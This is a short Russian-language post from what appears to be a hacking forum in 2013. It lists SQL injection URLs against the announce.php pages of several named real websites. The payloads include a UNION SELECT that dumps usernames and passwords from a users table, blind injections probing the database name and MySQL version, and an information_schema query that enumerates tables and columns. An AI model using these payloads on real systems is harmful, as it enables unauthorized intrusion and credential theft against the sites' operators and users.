Показать сообщение отдельно

  #9  
Старый 12.08.2013, 13:45
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами: 7343606

Репутация: 652


По умолчанию

Цитата:
Сообщение от None  
http://
www.stratfordcitycentre.ca
/announce.php?id=49+and+1=2+union+select+1,2,group_ concat(username,0x3a,password),4 from users --+
================================

blind, первая буква названия базы s

Цитата:
Сообщение от None  
http://
www.scit.edu.in
/announce.php?id=14' and(substr(database(),1,1)='s') and '1 --+
================================

blind, mysql 5 версии

Цитата:
Сообщение от None  
http://
www.jmmgrace.com
/announce.php?id=P126' and(substr(version(),1,1)=5) and '1 --+
================================

Цитата:
Сообщение от None  
http://
www.ripcoms.com
/announce.php?ID=1'+and+1=2+union+select+1,(select( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),3,4,5,6,7,8 --+
================================
 
Ответить с цитированием